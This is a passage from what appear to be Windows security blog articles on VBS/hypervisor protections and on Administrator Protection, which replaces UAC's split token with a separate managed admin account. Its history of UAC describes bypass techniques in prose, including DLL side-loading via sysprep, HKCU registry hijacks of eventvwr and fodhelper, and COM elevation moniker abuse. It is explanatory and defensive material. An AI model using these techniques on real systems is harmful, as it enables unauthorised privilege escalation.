// Required floor properties (e.g. Secure Boot, DMA protection, SMM mitigation) const requiredFloor = [1, 2, 3]; // service codes per Win32_DeviceGuard for (const r of requiredFloor) { if (!dg.AvailableSecurityProperties.includes(r)) { result.reasons.push('Missing required security property: ' + r); } }

result.ok = result.reasons.length === 0; return result; }

const example = { VirtualizationBasedSecurityStatus: 2, SecurityServicesRunning: [1, 2, 3], AvailableSecurityProperties: [1, 2, 3, 4, 5], }; console.log(JSON.stringify(checkVbsHealth(example), null, 2)); // -> { ok: true, reasons: [] } `}

Note: Three commands, in order: msinfo32 for the human-readable summary; Get-CimInstance -ClassName Win32_DeviceGuard | Format-List * for the structured detail; bcdedit /enum {current} to confirm hypervisorlaunchtype Auto and the absence of DISABLE_VBS_* load options. If all three agree that VBS, HVCI, and Credential Guard are running, you are in the configuration this article describes.

12.2 Operational pitfalls

Two operational realities are worth flagging. First, HVCI has a driver block list and will refuse to enable Memory Integrity if any incompatible driver is installed; the usual offenders are older anti-cheat drivers, third-party virtualization clients (VMware Workstation pre-2021, VirtualBox pre-6.1), and certain disk-encryption or storage-filter drivers. Microsoft maintains a public block list; the Memory Integrity UI in Windows Security will report the specific blocking driver. Second, nested virtualization is supported for Hyper-V guests on Windows 10/11 client and Server 2016+, and is required by some development workflows (WSL2 with nested containers, certain Visual Studio device emulators). Nested virtualization changes the threat model -- the L0 hypervisor still owns the box, but the L1 guest now runs its own hypervisor with its own VTL split -- so a compromised L1 guest with VBS enabled still does not give an L1 attacker a path to the L0 host.

12.3 The substrate cross-reference

This article is the substrate of the Windows security series at paragmali.com. The siblings build on what is here:

Secure Boot in Windows -- the static-RTM half of the boot trust chain that hands off to the hypervisor.
VBS Trustlets: What Actually Runs in the Secure Kernel -- the VTL1 internals that the hypervisor's secure-call ABI delivers requests to.
NTLMless: The Death of NTLM in Windows -- the Credential Guard story from inside LSAISO.
Adminless: Administrator Protection in Windows -- the user-mode admin trust model that the kernel-mode VBS boundary makes possible.
Can This Code Do This? Windows Access Control -- the access-control surface that VBS supplements but does not replace.

12.4 Frequently asked questions

The 10-30 percent number is folklore from the pre-SLAT era or from systems running HVCI-incompatible drivers in compatibility mode. For typical workloads on modern hardware (post-2018 CPUs with VT-x or AMD-V and SLAT), the measured overhead of VBS plus HVCI plus Credential Guard sits in the low single digits. Gaming and high-throughput I/O workloads can show larger gaps, especially on systems where the BIOS forces nested virtualization off or where IOMMU is disabled. The trade-off for that overhead is the security-boundary set described in this article. No. VBS is a Virtual Trust Level split *inside* the root partition. There are no extra VMs. The normal Windows install is VTL0; the Secure Kernel plus its trustlets is VTL1. Both VTLs live in the same partition, share the same physical CPU, and are scheduled by the hypervisor as separate VTL contexts -- not as separate VMs. A Hyper-V guest VM, by contrast, is a child partition entirely separate from the root partition. The two architectures share a hypervisor binary but use different parts of it. No. SYSTEM is a high VTL0 user-mode token; the hypervisor sits architecturally above all of Ring 0, which is where SYSTEM-loaded kernel drivers ultimately run. The point of the entire article is that "SYSTEM owns the box" is wrong on a VBS-enabled Windows install. SYSTEM is the most privileged Windows identity; the hypervisor is the most privileged *software*, and the two are not the same thing. No. Secure Boot prevents loading an *unsigned* `hvix64.exe`. It does not prevent loading an older, signed-but-vulnerable `hvix64.exe` that has not been added to the UEFI revocation list. That gap is what CVE-2024-21302 (Windows Downdate) exploited, and the mitigation is mandatory-update servicing combined with prompt revocation-list (`dbx`) hygiene [@nvd-cve-2024-21302]. No. seL4 is formally verified at approximately ten thousand lines of code with a roughly twenty-five-person-year proof effort. The Microsoft hypervisor is unverified at an estimated one to two hundred thousand lines of code. The hypervisor's security argument is operational -- a small TCB, heavy continuous fuzzing, a standing \$5K-\$250K bounty, public servicing criteria, an unflinching public CVE record -- rather than mathematical [@sel4-whitepaper, @ms-msrc-bounty-hyperv]. Yes, in terms of binary identity, servicing criteria, and bounty eligibility. The Microsoft hypervisor that boots on a Windows 11 client laptop and the one that boots on an Azure host server are derived from the same codebase, ship with the same servicing commitments, and qualify for the same Hyper-V bounty. The threat model differs -- Azure adds multi-tenant guest-to-guest isolation, hardware confidential-VM extensions, and a different management surface -- but the substrate is shared.

12.5 Closing

The reason SYSTEM on a Windows 11 box cannot read LSASS, load an unsigned driver, or patch ntoskrnl.exe is now fully accounted for. An hvix64.exe or hvax64.exe loaded by hvloader.efi before winload.exe ever ran. A VTL split inside the root partition, made possible by Hepkin and Kishan's 2013 patent and shipped with Windows 10 RTM in 2015. Per-VTL SLAT enforcement that the NT kernel architecturally cannot touch, because the SLAT tables live in pages the hypervisor never maps into a VTL0 view. A Microsoft-published security boundary and a $5,000-$250,000 bounty calibrating the boundary's value, both of which are unique in the industry at this writing. A public CVE record of six worked examples across three narrow classes that the boundary has had to pay out on since 2018. And a residual attack surface -- firmware below, side channels above, IOMMU bypass beside, hypervisor rollback through the update pipeline -- that the substrate cannot, by construction, eliminate.

The hypervisor is what every other article in this series sits on. Now you have the substrate in hand. The Secure Kernel article reads differently when you have walked the per-VTL SLAT yourself. The Credential Guard article reads differently when you know that LSAISO is invoked through a hypercall-mediated secure call. The Secure Boot article reads differently when you know that the hypervisor's DRTM measurement re-establishes the trust root after firmware. The Adminless article reads differently when you know that the privilege ceiling on Windows 11 is not Ring 0 but a hardware boundary above it.

Above Ring Zero is not a metaphor. It is an instruction-set state. The Windows hypervisor lives there, owns the page tables that say what the OS can see, and is the architectural reason "SYSTEM-on-Windows-11" cannot do things SYSTEM used to be allowed to do.

Adminless: How Windows Finally Made Elevation a Security Boundary

noreply@paragmali.com (Parag Mali) — Sun, 10 May 2026 00:00:00 GMT

**Administrator Protection (informally "Adminless") replaces Windows 11's split-token UAC with a separate, system-managed local user account.** The operating system creates this **System Managed Administrator Account (SMAA)** per local admin, links it to the primary admin via paired SAM attributes, and uses it to host elevated processes in a fresh logon session gated by Windows Hello. The kernel asks LSA to authenticate "a new instance of the shadow administrator" without any SMAA credential because the SMAA has none. The mechanism makes the elevation path a security boundary for the first time, with bulletin-grade fixes when it fails. Microsoft shipped it in KB5067036 on October 28, 2025, then reverted it on December 1, 2025 over an application-compatibility issue, not a security failure. This article walks the twenty-year argument that produced the design, the nine pre-GA bypasses Forshaw found and Microsoft fixed, and exactly where the new boundary still leaks.

1. Two tokens, one user, twenty years

Open an elevated console on a Windows 11 device with the registry value TypeOfAdminApprovalMode = 2 set, and run whoami /all. The user name is no longer yours. It is ADMIN_<sixteen random characters> -- a local account you never created, owned by an operating-system component you never ran, in a logon session that did not exist five seconds ago and will not exist five seconds after the console closes.

For twenty years, an elevated Windows command prompt reported the same user name as the unelevated one. The integrity level changed. The token changed. The user did not. That single architectural fact is the load-bearing premise of every UAC bypass ever published. The Vista User Account Control design from 2006 issued two tokens at logon for a member of the local Administrators group: a filtered standard-user token for everyday work, and a full admin token linked to it via the TokenLinkedToken field [@ms-uac-how-it-works]. When the user clicked Yes on a consent prompt, the Application Information service called CreateProcessAsUser with the linked token. Same user. Same profile. Same HKCU. Same logon session. Different integrity level.

Four resources stayed shared between the filtered and full tokens, and four categories of attack grew out of them. Files dropped in a writable directory the elevated process trusts. Registry values planted under HKEY_CURRENT_USER that an elevated binary reads before it consults HKEY_CLASSES_ROOT. COM elevation monikers that hand the attacker an elevated IFileOperation interface. Path-resolution overrides that redirect %SystemRoot% for a single auto-elevating process. The UACMe project [@uacme] catalogues 81 such methods, each one a load against the shared-resource shape of Vista's split token.

Administrator Protection inverts that shape. The elevated administrator becomes a different account with a different security identifier, a different profile directory, a different NTUSER.DAT hive, a different authentication-ID LUID, and a different DOS device object directory under \Sessions\0\DosDevices\. The operating system manages the account itself. It is created on demand the first time the policy is enabled, linked to the primary admin via paired Security Account Manager attributes, used in a fresh logon session for every elevation, and the elevated token is destroyed when the process exits [@ms-developer-blog-2025, @call4cloud-osint].

The feature ships under four names -- Administrator Protection in Microsoft Learn, Adminless as the community shorthand this article uses, ShadowAdmin in the samsrv.dll engineering symbols, System Managed Administrator Account (SMAA) in the Windows Developer Blog [@ms-admin-protection, @ms-developer-blog-2025, @call4cloud-osint] -- and §6 walks each in turn. The launch arc was short: announced at Ignite 2024 by David Weston on November 19, 2024 [@bleepingcomputer-2024], surfaced earlier that fall in Insider Preview build 27718 on October 2, 2024 [@ms-insider-build-27718], shipped to stable Windows in KB5067036 on October 28, 2025 [@ms-kb5067036], and disabled on December 1, 2025 over a WebView2 application-compatibility regression [@forshaw-pz-jan2026, @ms-admin-protection].

This article walks what changed and what did not. By the end you will know exactly which UAC bypass families are dead, exactly which survive, exactly what the December 2025 revert was about, and exactly where the new boundary still leaks. The path runs through twenty years of design tradeoffs and seven years of binary-level fixes that never converged on a real boundary. It runs through nine Project Zero bypasses Microsoft fixed before shipping. It ends at a question Microsoft's own design documents do not yet answer: when the prompt is a credential gate instead of a click-through, what is left for the attacker to do?

The first thing to understand is what UAC was trying to do, and why Microsoft said for twenty years it was not a security boundary.

2. "Convenience, not boundary": UAC as Microsoft conceived it

Why did Vista ship UAC at all? For most of Windows history, every interactive logon for a member of the local Administrators group produced one full-admin token. The desktop shell ran as a full administrator. Every child process inherited those rights. The worm era of 2003 to 2005 demonstrated, repeatedly, that one process running in user context owned the whole machine. By 2006 the cost of admin-by-default had become impossible to defend [@wikipedia-uac].The pre-Vista Limited User Account (LUA) was Microsoft's first attempt at a fix. The conceptual ancestor of the filtered token failed in practice because roughly half of the third-party application base broke under it, and the documented workaround -- RUNAS.EXE -- was operationally hostile enough that almost no one used it.

The redesign that produced UAC pivoted on a single observation. Forcing administrators to run as standard users had failed because too much software assumed admin rights. So Vista would give each admin user two identities. One would be standard-user enough to run the desktop, the browser, and the day-to-day applications without privilege. The other would carry the admin rights, and the operating system would arrange for the user to opt into it on a per-task basis.

Mark Russinovich's June 2007 article Inside Windows Vista User Account Control in TechNet Magazine [@russinovich-2007-vista] remains the canonical reference for the design. The mechanism is two tokens at logon; the integrity-level taxonomy (Low, Medium, High, System) gating object access; file-system and registry virtualisation rerouting writes by legacy apps; and Mandatory Integrity Control enforcing the no-write-up rule at the kernel-object boundary.

The mechanism by which Vista UAC assigns two distinct access tokens to a single interactive logon for a member of the local Administrators group. The Local Security Authority issues both at logon: a filtered standard-user token with most privileges removed and the Administrators group marked as deny-only, and a linked full administrator token referenced from the filtered token's `TokenLinkedToken` field [@ms-uac-how-it-works].

The disclaimer that follows the design is the single most quoted sentence Russinovich ever published about UAC. The article will lift it verbatim once, because every Administrator Protection design decision falls out of its absence:

It's important to be aware that UAC elevations are conveniences and not security boundaries. -- Mark Russinovich, *Inside Windows Vista User Account Control*, TechNet Magazine, June 2007 [@russinovich-2007-vista]

This is not an accidental disclaimer. It is the canonical Microsoft classification, preserved into the Microsoft Security Servicing Criteria document [@msrc-servicing-criteria]. James Forshaw of Google Project Zero, writing in January 2026, re-states the position verbatim: "due to the way it was designed, it was quickly apparent it didn't represent a hard security boundary, and Microsoft downgraded it to a security feature" [@forshaw-pz-jan2026]. The classification is what determined what Microsoft would and would not pay attention to. A "security boundary" gets a security bulletin when an attacker crosses it. A "security feature" does not. A bypass of a boundary is a vulnerability. A bypass of a feature is a quality bug. For twenty years, UAC bypasses were quality bugs.

The two-tokens-at-logon mechanism is the shape from which the entire bypass canon grows. The twenty years of evolution that follow run along a single timeline.

timeline title Privilege separation in Windows, NT 3.1 to Administrator Protection 1993 : NT 3.1 ships multi-user accounts and DACLs but admin-by-default desktop culture 2006 : Vista UAC introduces the split-token model and Mandatory Integrity Control 2009 : Davidson publishes the first UAC bypass; Windows 7 ships auto-elevation 2014 : hfiref0x's UACMe catalogue collects the bypass canon 2016 : enigma0x3 publishes the registry-hijack family (eventvwr, fodhelper, sdclt) 2019 : CVE-2019-1388 (consent.exe certificate dialog) is the lone UAC LPE bulletin 2024 : Insider Preview build 27718 surfaces Administrator Protection; Ignite 2024 announces it 2025 : KB5067036 ships the SMAA on stable Windows, then reverts on December 1 2026 : Forshaw's nine pre-GA bypasses all fixed; the elevation path is now a security boundary

To see why the entire bypass canon grew out of the split-token shape, the next section walks the mechanic at function-name granularity. It is the load-bearing pre-history of everything that comes after.

3. The Vista UAC split-token in detail

The mechanics at logon. The Local Security Authority Subsystem Service (LSASS) validates credentials. For a user in the local Administrators group, it constructs two tokens. The filtered token has its dangerous privileges removed and the Administrators SID marked deny-only; the full token retains them. The Token Manager wires the filtered token's TokenLinkedToken field to a handle on the full token. LSASS hands the filtered token to winlogon.exe. Winlogon launches userinit.exe. Userinit launches explorer.exe. The shell, holding the filtered token, becomes the parent process from which every user-initiated process inherits [@ms-uac-how-it-works].

The kernel structure that connects the filtered standard-user token to the linked full administrator token in Vista's split-token model. A process holding the filtered token can read the `TokenLinkedToken` field via the `GetTokenInformation` API to discover the handle of the full token, and pass that handle to `CreateProcessAsUser` to launch an elevated child. The same link is the structural premise of token-stealing attacks: any code path that can read or impersonate the linked token bypasses the consent UI entirely [@ms-uac-how-it-works, @forshaw-pz-jan2026].

The shell shares four resources with anything launched under the full token.

The same user security identifier. Both tokens carry the same primary SID. Files, registry keys, and kernel objects that grant access to the user grant identical access to both processes.
The same %USERPROFILE% directory tree. C:\Users\<user>\ is the home of both. The Documents folder, the Downloads folder, the AppData hives, and any application-specific subdirectory belong to one user.
The same HKEY_CURRENT_USER hive. Both tokens map HKCU to the same NTUSER.DAT file. An elevated process that reads a user setting reads the value the unelevated user wrote.
The same logon-session LUID. The Locally Unique Identifier that identifies an interactive logon session is the same on both tokens. The kernel uses that LUID as a key for per-logon-session caching: the DOS device object directory at \Sessions\0\DosDevices\<LUID>, drive-letter mappings, mapped network drives, and the credential cache.

The elevation pipeline. A user clicks Yes on a UAC prompt. The mechanism beneath that click runs through a chain of named function calls.

sequenceDiagram participant User as User shell (filtered token) participant AppInfo as appinfo.dll (Application Information service) participant Consent as consent.exe (secure desktop) participant LSA as LSASS participant New as Elevated child process

User->>AppInfo: ShellExecute / CreateProcess "as admin"
AppInfo->>AppInfo: RAiLaunchAdminProcess RPC
AppInfo->>AppInfo: Read manifest requestedExecutionLevel
AppInfo->>AppInfo: Check ConsentPromptBehaviorAdmin
AppInfo->>Consent: Launch consent.exe on Winlogon desktop
Consent->>User: Show Yes / No prompt
User-->>Consent: Click Yes
Consent-->>AppInfo: Approved
AppInfo->>LSA: Resolve TokenLinkedToken handle
AppInfo->>New: CreateProcessAsUser(linked full token)
Note over New: Same SID and profile and HKCU and logon session
Note over New: Integrity level High

The prompt runs on the secure desktop, the same Winlogon-owned Winsta0\Winlogon desktop where the credential-entry dialog appears at logon, not the user's interactive Winsta0\Default desktop [@ms-uac-how-it-works]. User Interface Privilege Isolation (UIPI) blocks lower-integrity input from reaching higher-integrity windows; the secure-desktop switch is its first defence against synthetic-keystroke attacks against the prompt itself.The secure desktop is not invulnerable. It changes the integrity-isolation context, but a process holding the filtered token can still trigger the switch (that is the whole point of clicking Yes), and code running before the switch can in principle modify the surrounding UI state. CVE-2019-1388 in late 2019 turned out to exploit a different aspect entirely -- a UI-interaction path through the consent.exe certificate-viewer dialog -- and not the secure-desktop switch itself.

Compare this to what comes next. Both tokens share four resources. Each of those resources is a category of attack waiting for a researcher to find it. The next section is the story of what happened when Microsoft tried to make UAC less annoying by silently elevating its own Microsoft-signed binaries -- and what the bypass canon did with the change.

4. Windows 7 auto-elevation and the birth of the bypass canon

A specific moment. December 2009. Leo Davidson publishes Windows 7 UAC whitelist: Code-injection Issue / Anti-Competitive API / Security Theatre on pretentiousname.com [@davidson-2009]. The title is the argument. The page itself is sprawling, contentious, and on a few key technical points exactly right. Microsoft's response, in Davidson's own words: "this is a non-issue, and ignored my offers to give them full details for several months." Microsoft Security Essentials eventually classified the binary (not the technique) as HackTool:Win32/Welevate.A and HackTool:Win64/Welevate.A; in Davidson's pointed observation, "recompiling the binaries in VS2010 means they are no longer detected" [@davidson-2009].Davidson kept writing into his original page over the following decade. A marker buried inside the text reads "As I was typing more words into this page, this appeared in my text editor at the 10,000th word!" In March 2020 he removed the proof-of-concept binaries, noting "I got sick of the page being marked as malware, even by Google (FFS)." The prose remains the canonical first source on UAC bypasses [@davidson-2009].

What Windows 7 added, in October 2009, to fix Vista's prompt-fatigue problem [@russinovich-2009-win7]:

The autoElevate=true manifest attribute, embedded in selected Microsoft-signed Windows binaries.
An internal whitelist of Microsoft-signed binaries living under %SystemRoot%\System32.
The COM Elevation Moniker -- already shipping in Vista (BIND_OPTS3, syntax Elevation:Administrator!new:<CLSID>) -- was the activation primitive. Windows 7 extended implicit auto-elevation to qualifying COM servers whose registrations matched the new whitelist criteria, so callers such as IFileOperation, ICMLuaUtil, and IColorDataProxy could be launched elevated without a consent prompt under the Win7 model [@russinovich-2009-win7, @uacme]. The dedicated registry-curation surface, the COMAutoApprovalList (HKLM\Software\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList) that UACMe Method 49 references verbatim, did not ship in Windows 7; it was introduced seven years later in Windows 10 RS1 (build 14393, August 2016) as a Redstone-1 hardening that replaced implicit COM auto-elevation with explicit list curation [@uacme].
The default consent-prompt behaviour ConsentPromptBehaviorAdmin = 5: prompt for consent for non-Windows binaries [@russinovich-2009-win7].

The Windows 7 mechanism by which selected Microsoft-signed binaries elevate without showing the consent prompt to a user who is a member of the local Administrators group. The Application Information service consults a whitelist of signature, path, and manifest attributes; if the binary qualifies, `appinfo.dll` calls `CreateProcessAsUser` with the linked full token and no UI step at all [@russinovich-2009-win7]. A COM activation syntax introduced in Windows Vista that lets an unelevated caller request an elevated instance of a COM server class. The `IBindCtx` is augmented with a `BIND_OPTS3` structure carrying a window handle to attribute the prompt to. The bind moniker `Elevation:Administrator!new:<CLSID>` causes the COM Service Control Manager to launch the server elevated. UACMe methods that target `IFileOperation`, `ICMLuaUtil`, and `IColorDataProxy` all descend from this mechanism [@russinovich-2009-win7, @uacme].

Davidson's technique against the new whitelist is one paragraph of detail. Use the IFileOperation COM elevation moniker, which itself auto-elevates, to write a planted CRYPTBASE.DLL into %SystemRoot%\System32\sysprep\. The path is a writable destination from the limited token because IFileOperation runs elevated. Then launch sysprep.exe, which is auto-elevated as a Microsoft-signed binary in System32. Sysprep loads CRYPTBASE.DLL from its own directory before the system path. The attacker's DLL runs at High integrity in the elevated sysprep process [@davidson-2009, @uacme]. No prompt. The whitelist did the work.

The bypass canon. Davidson's technique was the start, not the totality. The successors walked the same shape across families.

The DLL side-load family. Sysprep was the canonical instance. Subsequent variants targeted cliconfg.exe, mcx2prov.exe, migwiz.exe, and setupsqm.exe -- each an auto-elevating Microsoft binary that loaded a DLL from a writable directory before consulting the system path. Microsoft removed the auto-elevation attribute from many of these binaries over the Windows 10 1709 cycle, but did so one binary at a time [@uacme].
The registry-hijack family. Matt Nelson's August 2016 disclosure of an eventvwr.exe plus HKCU\Software\Classes\mscfile\shell\open\command bypass [@enigma0x3-2016-eventvwr] established the pattern. An auto-elevating binary consults HKEY_CURRENT_USER before HKEY_CLASSES_ROOT for a value the binary trusts to dispatch a child process. The limited user, who owns HKCU, writes whatever they want into the value. The elevated binary executes the attacker's command line. March 2017 produced sdclt.exe plus App Paths [@enigma0x3-2017-app-paths] and sdclt.exe plus IsolatedCommand [@enigma0x3-2017-sdclt]; May 2017 produced the fodhelper.exe plus ms-settings variant [@uacme]. All fileless. All generalising to any auto-elevating binary that walks HKCU before HKCR.
The COM-elevation-moniker abuse family. UACMe's Method 1 (Davidson's original IFileOperation) ages into Methods 41 (ICMLuaUtil, Oddvar Moe, via ucmCMLuaUtilShellExecMethod) and 43 (IColorDataProxy paired with ICMLuaUtil, Oddvar Moe derivative, via ucmDccwCOMMethod), each one a different COM interface that auto-elevates and exposes a method useful for arbitrary file or registry write [@uacme].
The environment-variable and path-poisoning family. Per-process %windir% or %SystemRoot% redirection via registry shims and Image File Execution Options, redirecting auto-elevating binaries to load resources from attacker-controlled directories.

Key idea: The Windows 7 auto-elevation whitelist was the bypass. The day Microsoft shipped a class of binaries that could elevate silently based on signing and path, the entire problem of UAC bypass reduced to "make one of those binaries do something the attacker wants it to do." Every UACMe method that targets a Microsoft-signed binary in System32 descends from this design choice. The 81-method catalogue is not a list of separate vulnerabilities; it is one architectural mistake spreading through the binary inventory.

Enter hfiref0x's UACMe [@uacme]. The project has been on GitHub since 2014. It currently lists 81 named methods. Each entry pairs the method number with the author credit, the target binary, the technique class, and the "Fixed in" build number. The README, taken together, is the institutional memory of UAC's failure as a boundary. Forshaw's January 2026 framing is the operational summary: "A good repository of known bypasses is the UACMe tool which currently lists 81 separate techniques for gaining administrator privileges" [@forshaw-pz-jan2026].

Microsoft chose to fix individual bypasses rather than redesign the model. The next section asks whether seven years of fixes ever caught up.

5. 2017-2024: incremental hardening, no convergence

The middle Windows 10 era was the moment Microsoft treated UAC bypasses as a quality problem and shipped fixes at quality-fix cadence, not security-bulletin cadence. The work was real, but it was always one binary or one interface at a time.

The named milestones, kept short.

Windows 10 1709 (October 2017). Beginning with this build, IFileOperation auto-elevation for callers other than Explorer was restricted [@uacme]. The originating Davidson 2009 family of bypasses, against the sysprep + planted-CRYPTBASE shape, ceased to function for processes other than the shell itself.
Tighter appinfo.dll manifest parsing across multiple Windows 10 builds. Stricter binary-signature checks. Stricter path checks. Stricter manifest checks. Each of these closed individual bypass methods; none of them closed a family.
Per-binary hardening recorded in UACMe's "Fixed in" column. UACMe version 3.5.0 retired roughly eighty percent of the 2014-vintage catalogue as obsolete; the v3.2.x branch retains the full historical record. The project's README warns that "since version 3.5.0, all previously 'fixed' methods are considered obsolete and have been removed. If you need them, use v3.2.x branch" [@uacme].
CVE-2019-1388 (November 2019; reporter: Eduardo Braun Prado via Trend Micro's Zero Day Initiative). The lone departure from the "UAC bypasses get no CVE" rule. A UI-interaction path through consent.exe's certificate-viewer dialog: an unsigned application could trigger consent.exe to display a certificate dialog whose "View Certificate" link launched Internet Explorer running as NT AUTHORITY\SYSTEM, and IE's File menu opened cmd.exe at the same integrity level [@nvd-cve-2019-1388]. Microsoft fixed it on the November 2019 Patch Tuesday and gave it an LPE bulletin.

CVE-2019-1388 was a prompt-UI bug -- specifically, a crash-path that surfaced an IE process at SYSTEM integrity via the certificate viewer -- not a UAC-bypass bug in the categorical sense. The classification distinction matters: Microsoft did not change its position that UAC was not a boundary; the bulletin treated this as a separate UI defect that incidentally crossed the boundary. CISA later added the CVE to the Known Exploited Vulnerabilities Catalog [@nvd-cve-2019-1388].

The accumulating evidence by 2024 was three observations.

UACMe's catalogue has grown from its 2014 origins to 81 methods today [@uacme]. Each family of attack survived the individual fixes. As Davidson predicted in 2009, the auto-elevation whitelist was the structural problem; patching each whitelisted binary as a separate bug was a treadmill, not a convergence.

Microsoft's own Security Servicing Criteria continued to classify UAC as a security feature, not a boundary, throughout the period [@msrc-servicing-criteria, @forshaw-pz-jan2026]. The decision was load-bearing. Fixing the elevation pipeline at quality cadence meant accepting that bypasses would appear quarterly and would not appear in the Patch Tuesday bulletins until the day Microsoft changed its mind about the classification.

The third piece of evidence is what the attackers were doing while the defenders were churning the binary list. Microsoft's own number, quoted by the Windows Developer Blog from the Microsoft Digital Defense Report 2024, is 39,000 token-theft incidents per day [@ms-developer-blog-2025]. A token, once stolen from an elevated process, requires no further bypass: it is a bearer credential good for the lifetime of the logon session. The same logon session is the one the unelevated user and the elevated process share under the split-token model. The "one logon session" property of UAC's design is the structural premise that token theft depends on.

There is one further thread worth naming here. Forshaw's broader 2022 Kerberos work in the user-credential-delegation space is a thread that survives the elevation-redesign question entirely. The May 2022 Exploiting RBCD using a normal user account post [@forshaw-2022-rbcd] is the representative artifact. Network-credential delegation primitives -- Resource-Based Constrained Delegation, User-to-User Kerberos, S4U2Self -- operate at a layer beneath token-level elevation, and survive even a perfect SMAA design because they do not run through the elevation path at all.

Piecewise fixes never converged on a boundary. The question that drove the next five years of Microsoft work was the obvious one: if the issue is the shared-resource model itself, what is the smallest plausible change that fixes it?

6. The breakthrough: the System Managed Administrator Account

The load-bearing design decision is one sentence. Stop trying to make one user account play both roles. The elevated administrator should be a different account with a different SID, a different profile, a different HKCU, a different logon session, and a different DOS device object directory -- and the operating system should manage that account itself.

What is striking about the design is how prosaic the underlying mechanism is. Multi-user accounts have shipped with Windows NT since version 3.1 in 1993. The architecture for running an elevated process under a separate local user has been present in NT for thirty-three years. What changed is that Microsoft finally chose to enforce the multi-user model for privilege separation, by making the operating system itself create and manage the second account, link it to the primary admin via paired Security Account Manager attributes, and use it for every elevation. The sophistication is in linkage, in lifecycle, and in removing auto-elevation, not in any single new primitive.

Note: The thing that changes between UAC and Administrator Protection is not the elevation mechanism (a manifest, a prompt, a CreateProcessAsUser call) but the elevation classification. An elevation bypass used to be a quality bug. It is now a security-bulletin vulnerability. Every Administrator Protection design decision -- separate account, fresh logon session, removed auto-elevation, Hello-gated consent -- is a consequence of the classification change.

The names. Microsoft Learn's term is Administrator Protection [@ms-admin-protection]. Microsoft's announcement material at Ignite 2024 and in the Insider Preview build 27718 post uses the same "Administrator Protection" label [@ms-insider-build-27718]; Adminless is the community shorthand that stuck. The internal engineering term in samsrv.dll (the Security Account Manager service DLL) is ShadowAdmin [@call4cloud-osint]. The Windows Developer Blog's canonical term for the underlying entity is the System Managed Administrator Account (SMAA) [@ms-developer-blog-2025].

The hidden local user account that Windows creates per primary administrator when the `TypeOfAdminApprovalMode` policy is set to 2. The SMAA has its own random user name (typically `ADMIN_`), its own SID, its own profile directory under `C:\Users\ADMIN_\`, its own `NTUSER.DAT` and therefore its own `HKCU`, and its own membership in the local Administrators group. The operating system uses it to host elevated processes; the user never logs into it directly [@ms-developer-blog-2025, @call4cloud-osint].

The SMAA lifecycle. Four beats. Each anchored to a verified source.

Provisioning. When TypeOfAdminApprovalMode = 2 is set under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System (either by Group Policy or by the Intune Settings Catalog), samsrv.dll's ShadowAdminAccount::CreateShadowAdminAccount runs once per existing local-administrator account. CreateRandomShadowAdminAccountName produces an ADMIN_<random> name. AddAccountToLocalAdministratorsGroup adds the new account to the Administrators group. Accounts managed by Windows LAPS (Local Administrator Password Solution) are skipped; their lifecycle is owned by a different subsystem and Microsoft did not want the SMAA mechanism to fight LAPS rotation [@call4cloud-osint].

Linking. Two paired SAM attributes encode the trust relationship between the two accounts. The primary admin's user record gets a ShadowAccountForwardLinkSid attribute pointing at the SMAA's SID. The SMAA's user record gets a ShadowAccountBackLinkSid attribute pointing back at the primary admin. These two attributes are the only structural relationship between the two accounts; everything else -- profile, HKCU, group memberships -- is independent [@call4cloud-osint].

Two paired SAM-database attributes that encode the trust relationship between a primary admin user and its System Managed Administrator Account. The forward link sits on the primary admin's record and points at the SMAA's SID. The back link sits on the SMAA's record and points back at the primary admin. The Application Information service uses the forward link at elevation time to resolve which SMAA to launch the elevated process under [@call4cloud-osint]. The registry value under `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System` that selects the elevation policy. Value 0 disables UAC. Value 1 selects classic Admin Approval Mode (the Vista / Win7 / Win10 split-token behaviour). Value 2 selects Admin Approval Mode with Administrator Protection: every elevation routes through the SMAA path. The value is set by Group Policy ("User Account Control: Configure type of Admin Approval Mode") or by an Intune Settings Catalog policy and requires a reboot to take effect [@ms-admin-protection, @call4cloud-osint].

Per-elevation use. appinfo.dll's RAiLaunchAdminProcess RPC endpoint reads TypeOfAdminApprovalMode. When the value is 2, it walks the forward link to find the calling user's SMAA, launches consent.exe on the secure desktop in credential prompt mode (not Yes/No), authenticates the primary user via Windows Hello (PIN, fingerprint, face, or password fallback), asks the kernel to ask LSA for a fresh primary token for the SMAA in a brand-new logon session, and calls CreateProcessAsUser with that token, the user's requested executable, and the SMAA's profile environment [@ms-developer-blog-2025, @ms-admin-protection, @forshaw-pz-jan2026]. The credential-less LSA logon at the heart of step three of this beat is walked in §7.

Teardown. When the elevated process exits, the SMAA's token handle goes out of scope. The logon session is reaped. The elevated profile directory remains on disk at C:\Users\ADMIN_<random>\ -- it has to, to preserve per-elevation user state across reboots -- but the live admin token does not. There is no persistent High-integrity process running between elevations [@ms-developer-blog-2025].

flowchart TD Start[Policy enabled: TypeOfAdminApprovalMode = 2] --> Provision Provision[samsrv.dll: CreateShadowAdminAccount per local admin] --> Naming Naming[CreateRandomShadowAdminAccountName -> ADMIN_random] --> AddGroup AddGroup[AddAccountToLocalAdministratorsGroup] --> Link Link[SAM linkage: ShadowAccountForwardLinkSid /
ShadowAccountBackLinkSid] --> Idle[SMAA exists, no token live] Idle -->|Each elevation| RPC[appinfo.dll: RAiLaunchAdminProcess] RPC --> Prompt[consent.exe: Hello credential prompt] Prompt --> LSA[Kernel asks LSA: credential-less logon for SMAA] LSA --> Run[CreateProcessAsUser with SMAA token] Run -->|Process exits| Teardown[Token handle released;
logon session reaped] Teardown --> Idle Windows creates a temporary isolated admin token to get the job done. This temporary token is immediately destroyed once the task is complete, ensuring that admin privileges do not persist. -- David Weston, Microsoft Ignite 2024 keynote, November 19, 2024 [@bleepingcomputer-2024]

Key idea: The single design decision behind Administrator Protection: the elevated and unelevated halves of an administrator must be different accounts. Different SID, different profile, different HKCU, different logon session, different DOS device object directory. The shared-resource attacks of the UAC bypass canon cannot persist if there are no shared resources.

The mechanism is now described. The next section walks it at function-name granularity for a single elevation, end to end -- and in particular, the credential-less LSA logon at step six that does the load-bearing work of minting the SMAA token without any SMAA credential.

7. The elevation pipeline end to end

Walk a single elevation. Nine steps.

The caller invokes ShellExecute or CreateProcess with an elevation request. For the shell-launched case the user right-clicks an executable and selects "Run as administrator"; the same RPC endpoint serves manifest-declared requestedExecutionLevel = "requireAdministrator" callers and Elevation:Administrator!new:<CLSID> COM moniker requests.
